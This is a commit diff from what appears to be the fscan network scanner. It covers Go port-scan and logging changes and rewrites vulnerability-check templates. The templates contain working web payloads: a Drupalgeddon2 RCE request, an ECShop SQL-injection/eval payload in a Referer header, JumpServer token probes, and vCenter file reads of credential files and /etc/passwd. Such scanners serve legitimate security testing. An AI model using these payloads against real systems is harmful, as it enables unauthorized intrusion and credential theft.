加入 404星链

2025-05-08 11:46:34 +00:00 · 2021-04-22 12:06:03 +08:00 · 2021-04-22 12:06:03 +08:00 · f1163fc3d7
commit f1163fc3d7
parent 2466fc3ea7
10 changed files with 59 additions and 104 deletions
--- a/Plugins/portscan.go
+++ b/Plugins/portscan.go
@ -26,6 +26,7 @@ func PortScan(hostslist []string, ports string, timeout int64) []string {
 	go func() {
 		for found := range results {
 			AliveAddress = append(AliveAddress, found)
 			wg.Done()
 		}
 	}()
@ -33,7 +34,7 @@ func PortScan(hostslist []string, ports string, timeout int64) []string {
 	for i := 0; i < workers; i++ {
 		go func() {
 			for addr := range Addrs {
-				PortConnect(addr, results, timeout)
+				PortConnect(addr, results, timeout, &wg)
 				wg.Done()
 			}
 		}()
@ -42,18 +43,17 @@ func PortScan(hostslist []string, ports string, timeout int64) []string {
 	//添加扫描目标
 	for _, port := range probePorts {
 		for _, host := range hostslist {
 			Addrs <- Addr{host, port}
 			wg.Add(1)
 			Addrs <- Addr{host, port}
 		}
 	}
 	wg.Wait()
 	close(Addrs)
 	close(results)
 	return AliveAddress
 }
-func PortConnect(addr Addr, respondingHosts chan<- string, adjustedTimeout int64) {
+func PortConnect(addr Addr, respondingHosts chan<- string, adjustedTimeout int64, wg *sync.WaitGroup) {
 	host, port := addr.ip, addr.port
 	con, err := net.DialTimeout("tcp4", fmt.Sprintf("%s:%v", host, port), time.Duration(adjustedTimeout)*time.Second)
 	if err == nil {
@ -62,5 +62,6 @@ func PortConnect(addr Addr, respondingHosts chan<- string, adjustedTimeout int64
 		result := fmt.Sprintf("%s open", address)
 		common.LogSuccess(result)
 		respondingHosts <- address
 		wg.Add(1)
 	}
 }
--- a/Plugins/scanner.go
+++ b/Plugins/scanner.go
@ -9,7 +9,6 @@ import (
 	"strconv"
 	"strings"
 	"sync"
 	"time"
 )
 func Scan(info common.HostInfo) {
@ -65,7 +64,7 @@ func Scan(info common.HostInfo) {
 		}
 	}
 	wg.Wait()
-	time.Sleep(100 * time.Millisecond)
+	common.Logwg.Wait()
 	close(common.Results)
 	fmt.Println(fmt.Sprintf("已完成 %v/%v", common.End, common.Num))
 }
@ -78,10 +77,8 @@ func AddScan(scantype string, info common.HostInfo, ch chan struct{}, wg *sync.W
 		Mutex.Lock()
 		common.Num += 1
 		Mutex.Unlock()
 		ScanFunc(PluginList, scantype, &info)
 		wg.Done()
 		Mutex.Lock()
 		common.End += 1
 		Mutex.Unlock()
--- a/README.md
+++ b/README.md
@ -143,6 +143,14 @@ https://github.com/hack2fun/Gscan
 https://github.com/k8gege/LadonGo   
 https://github.com/jjf012/gopoc
 # 404StarLink 2.0 - Galaxy
 ![](https://github.com/knownsec/404StarLink-Project/raw/master/logo.png)
 fscan 是 404Team [星链计划2.0](https://github.com/knownsec/404StarLink2.0-Galaxy) 中的一环，如果对fscan 有任何疑问又或是想要找小伙伴交流，可以参考星链计划的加群方式。
 - [https://github.com/knownsec/404StarLink2.0-Galaxy#community](https://github.com/knownsec/404StarLink2.0-Galaxy#community)
 ## 最近更新
 [+] 2021/4/21 加入netbios探测、域控识别  
 [+] 2021/3/4 支持-u url或者-uf url.txt,对url进行批量扫描  
--- a/WebScan/pocs/drupal-cve-2018-7600-rce.yml
+++ b/WebScan/pocs/drupal-cve-2018-7600-rce.yml
@ -2,35 +2,15 @@ name: poc-yaml-drupal-cve-2018-7600-rce
 set:
  r1: randomLowercase(4)
  r2: randomLowercase(4)
-groups:
+rules:
-  drupal8:
+  - method: POST
-    - method: POST
+    path: "/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax"
-      path: "/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax"
+    headers:
-      headers:
+      Content-Type: application/x-www-form-urlencoded
-        Content-Type: application/x-www-form-urlencoded
+    body: |
-      body: |
+      form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=printf&mail[#type]=markup&mail[#markup]={{r1}}%25%25{{r2}}
-        form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=printf&mail[#type]=markup&mail[#markup]={{r1}}%25%25{{r2}}
+    expression: |
-      expression: |
+      response.body.bcontains(bytes(r1 + "%" + r2))
        response.body.bcontains(bytes(r1 + "%" + r2))
  drupal7:
    - method: POST
      path: "/?q=user/password&name[%23post_render][]=printf&name[%23type]=markup&name[%23markup]={{r1}}%25%25{{r2}}"
      headers:
        Content-Type: application/x-www-form-urlencoded
      body: |
        form_id=user_pass&_triggering_element_name=name&_triggering_element_value=&opz=E-mail+new+Password
      search: |
        name="form_build_id"\s+value="(?P<build_id>.+?)"
      expression: |
        response.status == 200
    - method: POST
      path: "/?q=file%2Fajax%2Fname%2F%23value%2F{{build_id}}"
      headers:
        Content-Type: application/x-www-form-urlencoded
      body: |
        form_build_id={{build_id}}
      expression: |
        response.body.bcontains(bytes(r1 + "%" + r2))
 detail:
  links:
    - https://github.com/dreadlocked/Drupalgeddon2
--- a/WebScan/pocs/ecshop-rce.yml
+++ b/WebScan/pocs/ecshop-rce.yml
@ -2,25 +2,15 @@ name: poc-yaml-ecshop-rce
 set:
  r1: randomInt(40000, 44800)
  r2: randomInt(40000, 44800)
-groups:
+rules:
-  2.x:
+  - method: POST
-    - method: POST
+    path: /user.php
-      path: /user.php
+    headers:
-      headers:
+      Referer: >-
-        Referer: >-
+       554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:193:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b6576616c09286261736536345f6465636f64650928275a585a686243676b5831425055315262634841784d6a4e644b54733d2729293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}554fcae493e564ee0dc75bdf2ebf94ca
-         554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:193:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b6576616c09286261736536345f6465636f64650928275a585a686243676b5831425055315262634841784d6a4e644b54733d2729293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}554fcae493e564ee0dc75bdf2ebf94ca
+      Content-Type: application/x-www-form-urlencoded
-        Content-Type: application/x-www-form-urlencoded
+    body: action=login&pp123=printf({{r1}}*{{r2}});
-      body: action=login&pp123=printf({{r1}}*{{r2}});
+    expression: response.status == 200 && response.body.bcontains(bytes(string(r1 * r2)))
      expression: response.status == 200 && response.body.bcontains(bytes(string(r1 * r2)))
  3.x:
    - method: POST
      path: /user.php
      headers:
        Referer: >-
         45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:"num";s:193:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b6576616c09286261736536345f6465636f64650928275a585a686243676b5831425055315262634841784d6a4e644b54733d2729293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}45ea207d7a2b68c49582d2d22adf953aads
        Content-Type: application/x-www-form-urlencoded
      body: action=login&pp123=printf({{r1}}*{{r2}});
      expression: response.status == 200 && response.body.bcontains(bytes(string(r1 * r2)))
 detail:
  author: 凉风(http://webkiller.cn/)
  links:
--- a/WebScan/pocs/jumpserver-unauth-rce.yml
+++ b/WebScan/pocs/jumpserver-unauth-rce.yml
@ -1,29 +1,17 @@
 name: poc-yaml-jumpserver-unauth-rce
 set:
  r1: randomLowercase(5)
-groups:
+rules:
-  users:
+  - method: GET
-    - method: GET
+    path: /api/v1/authentication/connection-token/
-      path: /api/v1/users/connection-token/
+    follow_redirects: false
-      follow_redirects: false
+    expression: |
-      expression: |
+      response.status == 401 && response.content_type.contains("application/json") && response.body.bcontains(b"not_authenticated")
-        response.status == 401 && response.content_type.contains("application/json") && response.body.bcontains(b"not_authenticated")
+  - method: GET
-    - method: GET
+    path: /api/v1/authentication/connection-token/?user-only={{r1}}
-      path: /api/v1/users/connection-token/?user-only={{r1}}
+    follow_redirects: false
-      follow_redirects: false
+    expression: |
-      expression: |
+      response.status == 404 && response.content_type.contains("application/json") && response.body.bcontains(b"\"\"")
        response.status == 404 && response.content_type.contains("application/json") && response.body.bcontains(b"\"\"")
  authentication:
    - method: GET
      path: /api/v1/authentication/connection-token/
      follow_redirects: false
      expression: |
        response.status == 401 && response.content_type.contains("application/json") && response.body.bcontains(b"not_authenticated")
    - method: GET
      path: /api/v1/authentication/connection-token/?user-only={{r1}}
      follow_redirects: false
      expression: |
        response.status == 404 && response.content_type.contains("application/json") && response.body.bcontains(b"\"\"")
 detail:
  author: mvhz81
  info: jumpserver unauth read logfile + jumpserver rce
--- a/WebScan/pocs/ruijie-uac-cnvd-2021-14536.yml
+++ b/WebScan/pocs/ruijie-uac-cnvd-2021-14536.yml
@ -4,7 +4,7 @@ rules:
    path: /login.php
    follow_redirects: false
    expression: |
-      response.status == 200  && response.body.bcontains(b"get_dkey_passwd") && response.body.bcontains(b"password")
+      response.status == 200 && response.body.bcontains(b"<title>RG-UAC登录页面</title>") && response.body.bcontains(b"get_dkey_passwd") && "\"password\":\"[a-f0-9]{32}\"".bmatches(response.body)
 detail:
  author: jweny(https://github.com/jweny)
  links:
--- a/WebScan/pocs/springboot-env-unauth.yml
+++ b/WebScan/pocs/springboot-env-unauth.yml
@ -1,15 +1,9 @@
 name: poc-yaml-springboot-env-unauth
-groups:
+rules:
-  spring1:
+  - method: GET
-    - method: GET
+    path: /env
-      path: /env
+    expression: |
-      expression: |
+      response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"java.version") && response.body.bcontains(b"os.arch")
        response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"java.version") && response.body.bcontains(b"os.arch")
  spring2:
    - method: GET
      path: /actuator/env
      expression: |
        response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"java.version") && response.body.bcontains(b"os.arch")
 detail:
  links:
    - https://github.com/LandGrey/SpringBootVulExploit
--- a/WebScan/pocs/vmware-vcenter-arbitrary-file-read.yml
+++ b/WebScan/pocs/vmware-vcenter-arbitrary-file-read.yml
@ -1,17 +1,10 @@
 name: poc-yaml-vmware-vcenter-arbitrary-file-read
-groups:
+rules:
-  win:
+  - method: GET
-    - method: GET
+    path: /eam/vib?id=C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\vcdb.properties
-      path: /eam/vib?id=C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\vcdb.properties
+    follow_redirects: false
-      follow_redirects: false
+    expression: |
-      expression: |
+      response.status == 200 && response.body.bcontains(b"org.postgresql.Driver")
        response.status == 200 && response.body.bcontains(b"org.postgresql.Driver")
  linux:
    - method: GET
      path: /eam/vib?id=/etc/passwd
      follow_redirects: false
      expression: |
        response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
 detail:
  author: MrP01ntSun(https://github.com/MrPointSun)
  links:
--- a/common/log.go
+++ b/common/log.go
@ -4,6 +4,7 @@ import (
 	"fmt"
 	"os"
 	"strings"
 	"sync"
 	"time"
 )
@ -14,8 +15,10 @@ var Start = true
 var LogSucTime int64
 var LogErrTime int64
 var WaitTime int64
 var Logwg sync.WaitGroup
 func LogSuccess(result string) {
 	Logwg.Add(1)
 	LogSucTime = time.Now().Unix()
 	if Start {
 		go SaveLog()
@ -30,6 +33,7 @@ func SaveLog() {
 		if IsSave {
 			WriteFile(result, Outputfile)
 		}
 		Logwg.Done()
 	}
 }